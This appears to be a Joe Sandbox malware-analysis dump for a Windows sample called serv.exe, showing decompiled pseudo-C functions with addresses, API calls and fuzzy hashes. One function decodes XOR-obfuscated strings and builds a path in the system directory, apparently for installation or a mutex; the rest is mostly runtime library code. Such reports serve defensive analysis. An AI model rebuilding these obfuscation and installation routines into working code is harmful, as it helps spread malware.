                                                                    0x00417025
                                                                    0x00417025

                                                                    APIs
                                                                      • Part of subcall function 0040D1C0: GetTickCount.KERNEL32 ref: 0040D1CA
                                                                      • Part of subcall function 0040D1C0: GetTickCount.KERNEL32 ref: 0040D1D8
                                                                      • Part of subcall function 0040D1C0: GetTickCount.KERNEL32 ref: 0040D1E6
                                                                      • Part of subcall function 0040D1C0: GetTickCount.KERNEL32 ref: 0040D1F4
                                                                    • Sleep.KERNEL32(00000001), ref: 00416F57
                                                                    • GetTickCount.KERNEL32 ref: 004170B5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: CountTick$Sleep
                                                                    • String ID: #
                                                                    • API String ID: 4250438611-1885708031
                                                                    • Opcode ID: eda730a3031c8f399deb140533b5728a6d60d7d62de79620a66415f21f5a9921
                                                                    • Instruction ID: a1ea3fcd721d591e2eafdedace09154b760c8a6e3c127037941cf771bc0379b1
                                                                    • Opcode Fuzzy Hash: eda730a3031c8f399deb140533b5728a6d60d7d62de79620a66415f21f5a9921
                                                                    • Instruction Fuzzy Hash: DDD1D47550C3819BD315DF24D881BEBBBE5AFD9304F00482EF98557382D738998ACB96
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041F040(void* __ecx, char _a56, char _a60, char _a152, char _a156, char _a324, char _a348) {
                                                                    				void _v76;
                                                                    				intOrPtr _v84;
                                                                    				void _v88;
                                                                    				char _v92;
                                                                    				char _v94;
                                                                    				char _v95;
                                                                    				char _v96;
                                                                    				char _v97;
                                                                    				char _v98;
                                                                    				char _v99;
                                                                    				char _v100;
                                                                    				char _v101;
                                                                    				char _v102;
                                                                    				char _v103;
                                                                    				char _v104;
                                                                    				char _v105;
                                                                    				char _v106;
                                                                    				char _v107;
                                                                    				char _v108;
                                                                    				char _v109;
                                                                    				char _v110;
                                                                    				char _v111;
                                                                    				char _v112;
                                                                    				char _v113;
                                                                    				char _v114;
                                                                    				char _v115;
                                                                    				char _v116;
                                                                    				char _v117;
                                                                    				char _v118;
                                                                    				char _v119;
                                                                    				char _v120;
                                                                    				char _v121;
                                                                    				char _v122;
                                                                    				char _v123;
                                                                    				char _v124;
                                                                    				char _v125;
                                                                    				char _v126;
                                                                    				char _v127;
                                                                    				char _v128;
                                                                    				char _v129;
                                                                    				char _v130;
                                                                    				char _v131;
                                                                    				char _v132;
                                                                    				char _v136;
                                                                    				char _v137;
                                                                    				char _v138;
                                                                    				char _v139;
                                                                    				char _v140;
                                                                    				char _v141;
                                                                    				char _v142;
                                                                    				char _v143;
                                                                    				char _v144;
                                                                    				char _v145;
                                                                    				char _v146;
                                                                    				char _v147;
                                                                    				char _v148;
                                                                    				void* _t87;
                                                                    				intOrPtr _t93;
                                                                    				short _t94;
                                                                    				void* _t95;
                                                                    				unsigned int _t96;
                                                                    				CHAR* _t118;
                                                                    				int _t121;
                                                                    				void _t125;
                                                                    				void _t126;
                                                                    				signed int _t128;
                                                                    				void* _t138;
                                                                    				short* _t145;
                                                                    				void* _t147;
                                                                    				void* _t156;
                                                                    				signed int _t161;
                                                                    				void* _t163;
                                                                    
                                                                    				_t163 = (_t161 & 0xfffffff8) - 0x90;
                                                                    				_v146 = 0xb9;
                                                                    				_v143 = 0xb9;
                                                                    				_v148 = 0xa7;
                                                                    				_v147 = 0xbe;
                                                                    				_v145 = 0xbb;
                                                                    				_v144 = 0xa4;
                                                                    				_v142 = 0xfd;
                                                                    				_v141 = 0xba;
                                                                    				_v140 = 0xe7;
                                                                    				_v139 = 0xac;
                                                                    				_v138 = 0xb1;
                                                                    				_v137 = 0xac;
                                                                    				_v136 = 0xc9;
                                                                    				_t121 = 0;
                                                                    				do {
                                                                    					 *(_t163 + _t121 + 0x10) =  *(_t163 + _t121 + 0x10) ^ 0x000000c9;
                                                                    					_t121 = _t121 + 1;
                                                                    				} while (_t121 < 0xd);
                                                                    				_v128 = 0xfd;
                                                                    				_v126 = 0xfd;
                                                                    				_v122 = 0xfd;
                                                                    				_v117 = 0xfd;
                                                                    				_v116 = 0xfd;
                                                                    				_v101 = 0xfd;
                                                                    				_v132 = 0xb2;
                                                                    				_v131 = 0xad;
                                                                    				_v130 = 0xa8;
                                                                    				_v129 = 0xab;
                                                                    				_v127 = 0xf0;
                                                                    				_v125 = 0xff;
                                                                    				_v124 = 0xad;
                                                                    				_v123 = 0xe4;
                                                                    				_v121 = 0xf8;
                                                                    				_v120 = 0xaa;
                                                                    				_v119 = 0xfc;
                                                                    				_v118 = 0xe4;
                                                                    				_v115 = 0xf0;
                                                                    				_v114 = 0xfe;
                                                                    				_v113 = 0xe4;
                                                                    				_v112 = 0xa8;
                                                                    				_v111 = 0xf1;
                                                                    				_v110 = 0xf9;
                                                                    				_v109 = 0xa8;
                                                                    				_v108 = 0xe4;
                                                                    				_v107 = 0xfe;
                                                                    				_v106 = 0xab;
                                                                    				_v105 = 0xfc;
                                                                    				_v104 = 0xad;
                                                                    				_v103 = 0xfc;
                                                                    				_v102 = 0xac;
                                                                    				_v100 = 0xf0;
                                                                    				_v99 = 0xfa;
                                                                    				_v98 = 0xac;
                                                                    				_v97 = 0xfe;
                                                                    				_v96 = 0xf0;
                                                                    				_v95 = 0xb4;
                                                                    				_v94 = 0xc9;
                                                                    				_t87 = 0;
                                                                    				do {
                                                                    					 *(_t163 + _t87 + 0x20) =  *(_t163 + _t87 + 0x20) ^ 0x000000c9;
                                                                    					_t87 = _t87 + 1;
                                                                    				} while (_t87 < 0x27);
                                                                    				_t118 = E0041ACD0(E0041AC50(), 8, 0x104);
                                                                    				memset( &_v88, 0, 0x11 << 2);
                                                                    				_v88 = 0x44;
                                                                    				GetSystemDirectoryA(_t118, 0x104);
                                                                    				_t145 = _t118 - 1;
                                                                    				do {
                                                                    					_t93 =  *((intOrPtr*)(_t145 + 1));
                                                                    					_t145 = _t145 + 1;
                                                                    				} while (_t93 != 0);
                                                                    				_t94 =  *0x4301d8; // 0x5c
                                                                    				 *_t145 = _t94;
                                                                    				_t95 =  &_v148;
                                                                    				_t138 = _t95;
                                                                    				do {
                                                                    					_t125 =  *_t95;
                                                                    					_t95 = _t95 + 1;
                                                                    				} while (_t125 != 0);
                                                                    				_t96 = _t95 - _t138;
                                                                    				_t147 = _t118 - 1;
                                                                    				do {
                                                                    					_t126 =  *(_t147 + 1);
                                                                    					_t147 = _t147 + 1;
                                                                    				} while (_t126 != 0);
                                                                    				_t128 = _t96 >> 2;
                                                                    				_t156 = _t138;
                                                                    				memcpy(_t156 + _t128 + _t128, _t156, memcpy(_t147, _t156, _t128 << 2) & 0x00000003);
                                                                    				memset( &_v76, 0, 0x11 << 2);
                                                                    				_t70 =  &_a56; // 0x0
                                                                    				_v76 = 0x44;
                                                                    				if( *_t70 == 0) {
                                                                    					L12:
                                                                    					_t73 =  &_a152; // 0x0
                                                                    					if( *_t73 == 0) {
                                                                    						L19:
                                                                    						E0041AD50(E0041AC50(), 0, _t118);
                                                                    						return 1;
                                                                    					}
                                                                    					_t74 =  &_a156; // 0x0
                                                                    					if( *_t74 != 0) {
                                                                    						goto L19;
                                                                    					}
                                                                    					L14:
                                                                    					_t75 =  &_a324; // 0x0
                                                                    					if( *_t75 == 0) {
                                                                    						_a324 = E0041A7A0(0, 1, 0,  &_v132);
                                                                    					}
                                                                    					_t78 =  &_a348; // 0x0
                                                                    					if( *_t78 == 0 && E0041B070(_t118, 0, 0, 0, 1, 0, 0, 0,  &_v76,  &_v92) != 0) {
                                                                    						_a348 = _v84;
                                                                    						E0041A8E0(_v92);
                                                                    						E0041A8E0(_v92);
                                                                    					}
                                                                    					goto L19;
                                                                    				}
                                                                    				_t72 =  &_a60; // 0x0
                                                                    				if( *_t72 == 0) {
                                                                    					goto L14;
                                                                    				}
                                                                    				goto L12;
                                                                    			}











































































                                                                    0x0041f046
                                                                    0x0041f054
                                                                    0x0041f058
                                                                    0x0041f05e
                                                                    0x0041f063
                                                                    0x0041f068
                                                                    0x0041f06d
                                                                    0x0041f072
                                                                    0x0041f076
                                                                    0x0041f07b
                                                                    0x0041f080
                                                                    0x0041f085
                                                                    0x0041f08a
                                                                    0x0041f08f
                                                                    0x0041f094
                                                                    0x0041f096
                                                                    0x0041f096
                                                                    0x0041f09b
                                                                    0x0041f09c
                                                                    0x0041f0a7
                                                                    0x0041f0ab
                                                                    0x0041f0af
                                                                    0x0041f0b3
                                                                    0x0041f0b7
                                                                    0x0041f0bb
                                                                    0x0041f0bf
                                                                    0x0041f0c4
                                                                    0x0041f0c9
                                                                    0x0041f0ce
                                                                    0x0041f0d3
                                                                    0x0041f0d7
                                                                    0x0041f0dc
                                                                    0x0041f0e1
                                                                    0x0041f0e5
                                                                    0x0041f0ea
                                                                    0x0041f0ef
                                                                    0x0041f0f4
                                                                    0x0041f0f8
                                                                    0x0041f0fc
                                                                    0x0041f100
                                                                    0x0041f104
                                                                    0x0041f109
                                                                    0x0041f10e
                                                                    0x0041f113
                                                                    0x0041f118
                                                                    0x0041f11c
                                                                    0x0041f120
                                                                    0x0041f125
                                                                    0x0041f12a
                                                                    0x0041f12f
                                                                    0x0041f134
                                                                    0x0041f139
                                                                    0x0041f13d
                                                                    0x0041f142
                                                                    0x0041f147
                                                                    0x0041f14b
                                                                    0x0041f14f
                                                                    0x0041f154
                                                                    0x0041f159
                                                                    0x0041f160
                                                                    0x0041f160
                                                                    0x0041f165
                                                                    0x0041f166
                                                                    0x0041f17d
                                                                    0x0041f18f
                                                                    0x0041f192
                                                                    0x0041f19a
                                                                    0x0041f1a2
                                                                    0x0041f1a3
                                                                    0x0041f1a3
                                                                    0x0041f1a6
                                                                    0x0041f1a7
                                                                    0x0041f1ab
                                                                    0x0041f1b1
                                                                    0x0041f1b4
                                                                    0x0041f1b8
                                                                    0x0041f1c0
                                                                    0x0041f1c0
                                                                    0x0041f1c2
                                                                    0x0041f1c3
                                                                    0x0041f1c9
                                                                    0x0041f1cb
                                                                    0x0041f1d0
                                                                    0x0041f1d0
                                                                    0x0041f1d3
                                                                    0x0041f1d4
                                                                    0x0041f1da
                                                                    0x0041f1dd
                                                                    0x0041f1e6
                                                                    0x0041f1f3
                                                                    0x0041f1f5
                                                                    0x0041f1fa
                                                                    0x0041f202
                                                                    0x0041f20b
                                                                    0x0041f20b
                                                                    0x0041f213
                                                                    0x0041f289
                                                                    0x0041f292
                                                                    0x0041f2a3
                                                                    0x0041f2a3
                                                                    0x0041f215
                                                                    0x0041f21d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041f21f
                                                                    0x0041f21f
                                                                    0x0041f227
                                                                    0x0041f239
                                                                    0x0041f239
                                                                    0x0041f23f
                                                                    0x0041f247
                                                                    0x0041f274
                                                                    0x0041f27a
                                                                    0x0041f284
                                                                    0x0041f284
                                                                    0x00000000
                                                                    0x0041f247
                                                                    0x0041f204
                                                                    0x0041f209
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    APIs
                                                                    • GetSystemDirectoryA.KERNEL32 ref: 0041F19A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: DirectorySystem
                                                                    • String ID: D$D
                                                                    • API String ID: 2188284642-143366177
                                                                    • Opcode ID: aa7af0bf25e92ba6f468edf1311c75f66fb8aa6ae26c8a848d7b3fb8baf1615f
                                                                    • Instruction ID: 35f7fd7dbea129be8c2d06b6f87f8363cfca897c6f7918c03e147ac4b890d4d7
                                                                    • Opcode Fuzzy Hash: aa7af0bf25e92ba6f468edf1311c75f66fb8aa6ae26c8a848d7b3fb8baf1615f
                                                                    • Instruction Fuzzy Hash: 85714B3120C7C29AD321CA7C488478BBFE15BA7224F480B9DF5E49B3E2D255C54AC36B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 65%
                                                                    			E00427585(void* __ebx, void* __edi, void* __esi) {
                                                                    				intOrPtr _v8;
                                                                    				char _v21;
                                                                    				signed char _v22;
                                                                    				struct _cpinfo _v28;
                                                                    				char _v284;
                                                                    				char _v540;
                                                                    				char _v796;
                                                                    				char _v1308;
                                                                    				void* __ebp;
                                                                    				intOrPtr _t42;
                                                                    				signed int _t45;
                                                                    				char _t47;
                                                                    				signed char _t48;
                                                                    				signed int _t58;
                                                                    				signed int _t59;
                                                                    				signed int _t65;
                                                                    				signed int _t68;
                                                                    				signed char _t70;
                                                                    				char _t71;
                                                                    				signed int _t73;
                                                                    				signed int _t74;
                                                                    				signed char* _t78;
                                                                    				signed char* _t79;
                                                                    				void* _t81;
                                                                    				void* _t86;
                                                                    				void* _t87;
                                                                    
                                                                    				_t80 = __edi;
                                                                    				_t63 = __ebx;
                                                                    				_t42 =  *0x446f24; // 0x81a0b55c
                                                                    				_v8 = _t42;
                                                                    				if(GetCPInfo( *0x44b004,  &_v28) != 1) {
                                                                    					_t45 = 0;
                                                                    					__eflags = 0;
                                                                    					do {
                                                                    						__eflags = _t45 - 0x41;
                                                                    						if(_t45 < 0x41) {
                                                                    							L23:
                                                                    							__eflags = _t45 - 0x61;
                                                                    							if(_t45 < 0x61) {
                                                                    								L26:
                                                                    								 *(_t45 + 0x44b020) = 0;
                                                                    							} else {
                                                                    								__eflags = _t45 - 0x7a;
                                                                    								if(_t45 > 0x7a) {
                                                                    									goto L26;
                                                                    								} else {
                                                                    									 *(_t45 + 0x44af01) =  *(_t45 + 0x44af01) | 0x00000020;
                                                                    									_t68 = _t45 - 0x20;
                                                                    									goto L22;
                                                                    								}
                                                                    							}
                                                                    						} else {
                                                                    							__eflags = _t45 - 0x5a;
                                                                    							if(_t45 > 0x5a) {
                                                                    								goto L23;
                                                                    							} else {
                                                                    								 *(_t45 + 0x44af01) =  *(_t45 + 0x44af01) | 0x00000010;
                                                                    								_t68 = _t45 + 0x20;
                                                                    								__eflags = _t68;
                                                                    								L22:
                                                                    								 *(_t45 + 0x44b020) = _t68;
                                                                    							}
                                                                    						}
                                                                    						_t45 = _t45 + 1;
                                                                    						__eflags = _t45 - 0x100;
                                                                    					} while (_t45 < 0x100);
                                                                    				} else {
                                                                    					_t47 = 0;
                                                                    					do {
                                                                    						 *((char*)(_t86 + _t47 - 0x118)) = _t47;
                                                                    						_t47 = _t47 + 1;
                                                                    					} while (_t47 < 0x100);
                                                                    					_t48 = _v22;
                                                                    					_v284 = 0x20;
                                                                    					if(_t48 != 0) {
                                                                    						_push(__ebx);
                                                                    						_t78 =  &_v21;
                                                                    						_push(__edi);
                                                                    						do {
                                                                    							_t65 =  *_t78 & 0x000000ff;
                                                                    							_t59 = _t48 & 0x000000ff;
                                                                    							if(_t59 <= _t65) {
                                                                    								_t73 = _t65 - _t59 + 1;
                                                                    								_t74 = _t73 >> 2;
                                                                    								_t81 = _t86 + _t59 - 0x118;
                                                                    								memset(_t81 + _t74, memset(_t81, 0x20202020, _t74 << 2), (_t73 & 0x00000003) << 0);
                                                                    								_t87 = _t87 + 0x18;
                                                                    								_t65 = 0;
                                                                    							}
                                                                    							_t79 =  &(_t78[1]);
                                                                    							_t48 =  *_t79;
                                                                    							_t78 =  &(_t79[1]);
                                                                    							_t96 = _t48;
                                                                    						} while (_t48 != 0);
                                                                    						_pop(_t80);
                                                                    						_pop(_t63);
                                                                    					}
                                                                    					_push(0);
                                                                    					_push( *0x44aed8);
                                                                    					_push( *0x44b004);
                                                                    					_push( &_v1308);
                                                                    					_push(0x100);
                                                                    					_push( &_v284);
                                                                    					_push(1);
                                                                    					E00427CEB(_t63, _t65, _t80, 0x100, _t96);
                                                                    					_push(0);
                                                                    					_push( *0x44b004);
                                                                    					_push(0x100);
                                                                    					_push( &_v540);
                                                                    					_push(0x100);
                                                                    					_push( &_v284);
                                                                    					_push(0x100);
                                                                    					_push( *0x44aed8);
                                                                    					E0042933F(_t63, _t80, 0x100, _t96);
                                                                    					_push(0);
                                                                    					_push( *0x44b004);
                                                                    					_push(0x100);
                                                                    					_push( &_v796);
                                                                    					_push(0x100);
                                                                    					_push( &_v284);
                                                                    					_push(0x200);
                                                                    					_push( *0x44aed8);
                                                                    					E0042933F(_t63, _t80, 0x100, _t96);
                                                                    					_t58 = 0;
                                                                    					do {
                                                                    						_t70 =  *((intOrPtr*)(_t86 + _t58 * 2 - 0x518));
                                                                    						if((_t70 & 0x00000001) == 0) {
                                                                    							__eflags = _t70 & 0x00000002;
                                                                    							if((_t70 & 0x00000002) == 0) {
                                                                    								 *((char*)(_t58 + 0x44b020)) = 0;
                                                                    							} else {
                                                                    								 *(_t58 + 0x44af01) =  *(_t58 + 0x44af01) | 0x00000020;
                                                                    								_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x318));
                                                                    								goto L12;
                                                                    							}
                                                                    						} else {
                                                                    							 *(_t58 + 0x44af01) =  *(_t58 + 0x44af01) | 0x00000010;
                                                                    							_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x218));
                                                                    							L12:
                                                                    							 *((char*)(_t58 + 0x44b020)) = _t71;
                                                                    						}
                                                                    						_t58 = _t58 + 1;
                                                                    					} while (_t58 < 0x100);
                                                                    				}
                                                                    				return E00428381(_t45, _v8);
                                                                    			}





























                                                                    0x00427585
                                                                    0x00427585
                                                                    0x0042758e
                                                                    0x00427593
                                                                    0x004275af
                                                                    0x004276c2
                                                                    0x004276c2
                                                                    0x004276c4
                                                                    0x004276c4
                                                                    0x004276c7
                                                                    0x004276e2
                                                                    0x004276e2
                                                                    0x004276e5
                                                                    0x004276fa
                                                                    0x004276fa
                                                                    0x004276e7
                                                                    0x004276e7
                                                                    0x004276ea
                                                                    0x00000000
                                                                    0x004276ec
                                                                    0x004276ec
                                                                    0x004276f5
                                                                    0x00000000
                                                                    0x004276f5
                                                                    0x004276ea
                                                                    0x004276c9
                                                                    0x004276c9
                                                                    0x004276cc
                                                                    0x00000000
                                                                    0x004276ce
                                                                    0x004276ce
                                                                    0x004276d7
                                                                    0x004276d7
                                                                    0x004276da
                                                                    0x004276da
                                                                    0x004276da
                                                                    0x004276cc
                                                                    0x00427701
                                                                    0x00427702
                                                                    0x00427702
                                                                    0x004275b5
                                                                    0x004275b5
                                                                    0x004275b7
                                                                    0x004275b7
                                                                    0x004275be
                                                                    0x004275bf
                                                                    0x004275c3
                                                                    0x004275c8
                                                                    0x004275cf
                                                                    0x004275d1
                                                                    0x004275d2
                                                                    0x004275d5
                                                                    0x004275d6
                                                                    0x004275d6
                                                                    0x004275d9
                                                                    0x004275de
                                                                    0x004275e2
                                                                    0x004275e5
                                                                    0x004275e8
                                                                    0x004275fb
                                                                    0x004275fb
                                                                    0x004275fb
                                                                    0x004275fb
                                                                    0x004275fd
                                                                    0x004275fe
                                                                    0x00427600
                                                                    0x00427601
                                                                    0x00427601
                                                                    0x00427605
                                                                    0x00427606
                                                                    0x00427606
                                                                    0x00427607
                                                                    0x00427609
                                                                    0x00427615
                                                                    0x0042761b
                                                                    0x0042761c
                                                                    0x00427623
                                                                    0x00427624
                                                                    0x00427626
                                                                    0x0042762b
                                                                    0x0042762d
                                                                    0x00427639
                                                                    0x0042763a
                                                                    0x0042763b
                                                                    0x00427642
                                                                    0x00427643
                                                                    0x00427644
                                                                    0x0042764a
                                                                    0x0042764f
                                                                    0x00427651
                                                                    0x0042765d
                                                                    0x0042765e
                                                                    0x0042765f
                                                                    0x00427666
                                                                    0x00427667
                                                                    0x0042766c
                                                                    0x00427672
                                                                    0x0042767a
                                                                    0x0042767c
                                                                    0x0042767c
                                                                    0x00427687
                                                                    0x0042769f
                                                                    0x004276a2
                                                                    0x004276b4
                                                                    0x004276a4
                                                                    0x004276a4
                                                                    0x004276ab
                                                                    0x00000000
                                                                    0x004276ab
                                                                    0x00427689
                                                                    0x00427689
                                                                    0x00427690
                                                                    0x00427697
                                                                    0x00427697
                                                                    0x00427697
                                                                    0x004276bb
                                                                    0x004276bc
                                                                    0x004276c0
                                                                    0x00427710

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: Info
                                                                    • String ID: $
                                                                    • API String ID: 1807457897-3032137957
                                                                    • Opcode ID: 18e2ff6c26c8253a2f8acef6f846d20aab1b8c5afafc6d36cc06a173ecefb2d2
                                                                    • Instruction ID: b740f4969e18365772719e246697fcdf2e7dcb58cf6709ad3cc1780a737a8b75
                                                                    • Opcode Fuzzy Hash: 18e2ff6c26c8253a2f8acef6f846d20aab1b8c5afafc6d36cc06a173ecefb2d2
                                                                    • Instruction Fuzzy Hash: 114178312086AC9EEB018728FC59FFB7FE8EB06304F6404E6D545C7162C3694989DB9E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 95%
                                                                    			E00426FD8() {
                                                                    				signed int _v8;
                                                                    				char _v12;
                                                                    				void* __ecx;
                                                                    				void* __esi;
                                                                    				CHAR* _t10;
                                                                    				signed int _t16;
                                                                    				signed int _t22;
                                                                    				CHAR* _t25;
                                                                    				signed int _t34;
                                                                    				CHAR* _t37;
                                                                    
                                                                    				_push(_t27);
                                                                    				if( *0x44c270 == 0) {
                                                                    					E004279F1();
                                                                    				}
                                                                    				_t37 = "C:\\Windows\\serv.exe";
                                                                    				 *0x4483c4 = 0;
                                                                    				GetModuleFileNameA(0, _t37, 0x104);
                                                                    				_t10 =  *0x44c29c;
                                                                    				 *0x448298 = _t37;
                                                                    				if(_t10 == 0) {
                                                                    					L4:
                                                                    					_t25 = _t37;
                                                                    				} else {
                                                                    					_t25 = _t10;
                                                                    					if( *_t10 == 0) {
                                                                    						goto L4;
                                                                    					}
                                                                    				}
                                                                    				E00426E6C(_t25, 0,  &_v12, 0,  &_v8);
                                                                    				_t40 = _v8 << 2;
                                                                    				_t16 = E00422EEB(_v12 + (_v8 << 2));
                                                                    				_t34 = _t16;
                                                                    				if(_t34 != 0) {
                                                                    					E00426E6C(_t25, _t40 + _t34,  &_v12, _t34,  &_v8);
                                                                    					 *0x44827c = _v8 - 1;
                                                                    					 *0x448280 = _t34;
                                                                    					_t22 = 0;
                                                                    				} else {
                                                                    					_t22 = _t16 | 0xffffffff;
                                                                    				}
                                                                    				return _t22;
                                                                    			}













                                                                    0x00426fdc
                                                                    0x00426fe8
                                                                    0x00426fea
                                                                    0x00426fea
                                                                    0x00426ff4
                                                                    0x00426ffb
                                                                    0x00427002
                                                                    0x00427008
                                                                    0x0042700f
                                                                    0x00427015
                                                                    0x0042701e
                                                                    0x0042701e
                                                                    0x00427017
                                                                    0x0042701a
                                                                    0x0042701c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042701c
                                                                    0x0042702c
                                                                    0x00427037
                                                                    0x0042703d
                                                                    0x00427042
                                                                    0x00427049
                                                                    0x0042705d
                                                                    0x00427067
                                                                    0x0042706d
                                                                    0x00427073
                                                                    0x0042704b
                                                                    0x0042704b
                                                                    0x0042704b
                                                                    0x00427079

                                                                    APIs
                                                                    • ___initmbctable.LIBCMT ref: 00426FEA
                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\serv.exe,00000104,74714DE0,00000000,?,?,?,?,00422D8E,?,004303A8,00000060), ref: 00427002
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleName___initmbctable
                                                                    • String ID: C:\Windows\serv.exe
                                                                    • API String ID: 767393020-435740134
                                                                    • Opcode ID: 234d9c4164fe2c07e38451fbac239e82db8c6eb335865d90f2dce875e6177481
                                                                    • Instruction ID: e9f62d43712f1c1b5a1ff82a4471d7df2633b42affd03636cc46f9ac5e368971
                                                                    • Opcode Fuzzy Hash: 234d9c4164fe2c07e38451fbac239e82db8c6eb335865d90f2dce875e6177481
                                                                    • Instruction Fuzzy Hash: 7011E776B04124ABDB10DBA5FC8199F77A8FB45760F5101AFF805D3240DAB49D04C768
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 69%
                                                                    			E0042335E(intOrPtr* __eax) {
                                                                    				void* _t14;
                                                                    				void* _t24;
                                                                    				void* _t27;
                                                                    				void* _t28;
                                                                    				void* _t29;
                                                                    				void* _t30;
                                                                    
                                                                    				if( *((intOrPtr*)( *__eax)) == 0xe06d7363) {
                                                                    					 *(E00423BDF() + 0x84) =  *(_t12 + 0x84) & 0x00000000;
                                                                    					_push(8);
                                                                    					_push(0x430470);
                                                                    					E0042422C(_t24, _t27, _t28);
                                                                    					_t14 = E00423BDF();
                                                                    					__eflags =  *(_t14 + 0x6c);
                                                                    					if( *(_t14 + 0x6c) != 0) {
                                                                    						 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                    						 *((intOrPtr*)(E00423BDF() + 0x6c))();
                                                                    						_t7 = _t29 - 4;
                                                                    						 *_t7 =  *(_t29 - 4) | 0xffffffff;
                                                                    						__eflags =  *_t7;
                                                                    					}
                                                                    					E00426A34();
                                                                    					E00429729(_t24, _t27, _t28, __eflags);
                                                                    					E0042552E(3);
                                                                    					asm("int3");
                                                                    					_t9 = _t30 + 4; // 0x423938
                                                                    					 *0x430100( *_t9, 0x16, 0xa);
                                                                    					__eflags = 1;
                                                                    					return 1;
                                                                    				} else {
                                                                    					return 0;
                                                                    				}
                                                                    			}









                                                                    0x00423366
                                                                    0x00423370
                                                                    0x00423e86
                                                                    0x00423e88
                                                                    0x00423e8d
                                                                    0x00423e92
                                                                    0x00423e97
                                                                    0x00423e9b
                                                                    0x00423e9d
                                                                    0x00423ea6
                                                                    0x00423eb2
                                                                    0x00423eb2
                                                                    0x00423eb2
                                                                    0x00423eb2
                                                                    0x00427a11
                                                                    0x00427a18
                                                                    0x00427a21
                                                                    0x00427a26
                                                                    0x00427a27
                                                                    0x00427a2b
                                                                    0x00427a33
                                                                    0x00427a34
